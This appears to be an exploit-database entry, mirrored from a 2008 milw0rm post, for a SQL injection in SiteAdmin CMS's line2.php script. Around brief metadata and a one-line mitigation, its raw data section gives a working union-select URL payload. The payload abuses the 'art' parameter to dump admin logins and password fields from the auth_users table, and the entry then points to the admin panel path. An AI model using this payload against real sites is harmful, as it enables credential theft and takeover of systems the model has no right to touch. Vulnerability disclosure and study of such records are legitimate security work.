header-logo
Suggest Exploit
vendor:
SiteAdmin CMS
by:
Cr@zy_King / sqL Lov3r'Z Crew Co.
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SiteAdmin CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SiteAdmin CMS Remote Sql Injection Vuln.

A vulnerability exists in SiteAdmin CMS which allows an attacker to inject malicious SQL queries via the 'lng' and 'art' parameters in the 'line2.php' script. This can be exploited to gain access to the admin panel by manipulating the 'auth_users' table in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

SiteAdmin CMS Remote Sql Injection Vuln.

Download : http://www.as-admin.com

Cr@zy_King / sqL Lov3r'Z Crew Co.

http://localhost/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2

Admin Panel : http://localhost/patch/admin/index.php

Thanks : aLL My Friend'Z

                    www.biyosecurity.com

                 ================From Turkey====================

# milw0rm.com [2008-07-27]

Navigation

Suggest Exploit

Services By CQR